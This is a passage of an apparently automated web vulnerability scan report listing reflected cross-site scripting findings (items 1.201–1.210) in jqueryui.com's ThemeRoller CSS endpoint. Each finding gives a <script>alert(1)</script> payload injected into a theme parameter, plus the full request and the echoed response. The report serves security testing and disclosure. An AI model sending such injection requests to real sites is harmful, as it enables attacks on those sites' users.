1.201. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureHighlight request parameter is copied into the HTML document as plain text between tags. The payload 42800<script>alert(1)</script>197b07124e6 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png42800<script>alert(1)</script>197b07124e6&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:00 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17800

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
lorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png42800<script>alert(1)</script>197b07124e6&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

1.202. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureHover request parameter is copied into the HTML document as plain text between tags. The payload 4b7b1<script>alert(1)</script>981281a4f1 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png4b7b1<script>alert(1)</script>981281a4f1&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:41 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17798

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
rDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png4b7b1<script>alert(1)</script>981281a4f1&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&
...[SNIP]...

1.203. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureOverlay request parameter is copied into the HTML document as plain text between tags. The payload 51826<script>alert(1)</script>05369075768 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png51826<script>alert(1)</script>05369075768&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:22 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18083

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png51826<script>alert(1)</script>05369075768&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRa
...[SNIP]...

1.204. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureShadow request parameter is copied into the HTML document as plain text between tags. The payload 8f4d4<script>alert(1)</script>0d8e7da9b92 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png8f4d4<script>alert(1)</script>0d8e7da9b92&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:23 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18080

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
Error=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png8f4d4<script>alert(1)</script>0d8e7da9b92&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px
*/

/* Component containers
----------------------------------*/
.ui-widge
...[SNIP]...

1.205. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorActive request parameter is copied into the HTML document as plain text between tags. The payload e455c<script>alert(1)</script>f14fbfd5217 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000e455c<script>alert(1)</script>f14fbfd5217&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:52 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ighlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000e455c<script>alert(1)</script>f14fbfd5217&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaa
...[SNIP]...

1.206. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorContent request parameter is copied into the HTML document as plain text between tags. The payload 486a3<script>alert(1)</script>334651bb09d was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040486a3<script>alert(1)</script>334651bb09d&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:30 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040486a3<script>alert(1)</script>334651bb09d&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorH
...[SNIP]...

1.207. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorDefault request parameter is copied into the HTML document as plain text between tags. The payload 788fb<script>alert(1)</script>67297e189ba was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc788fb<script>alert(1)</script>67297e189ba&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:34 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
g&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc788fb<script>alert(1)</script>67297e189ba&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212
...[SNIP]...

1.208. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorError request parameter is copied into the HTML document as plain text between tags. The payload f918c<script>alert(1)</script>062f0580db6 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0af918c<script>alert(1)</script>062f0580db6&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:19 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
t_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0af918c<script>alert(1)</script>062f0580db6&fcError=cd0a0a&iconColorError=cd0a0a
*/

/* Component containers
----------------------------------*/
.ui-widget { font-family: Helvetica, Arial, sans-serif; font-size: 1.1em; }
.ui-widget input, .ui
...[SNIP]...

1.209. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorHeader request parameter is copied into the HTML document as plain text between tags. The payload 2444c<script>alert(1)</script>12031a7a5b1 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=4040402444c<script>alert(1)</script>12031a7a5b1&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:25 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=4040402444c<script>alert(1)</script>12031a7a5b1&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault
...[SNIP]...

1.210. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorHighlight request parameter is copied into the HTML document as plain text between tags. The payload 6456d<script>alert(1)</script>154306ee43d was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

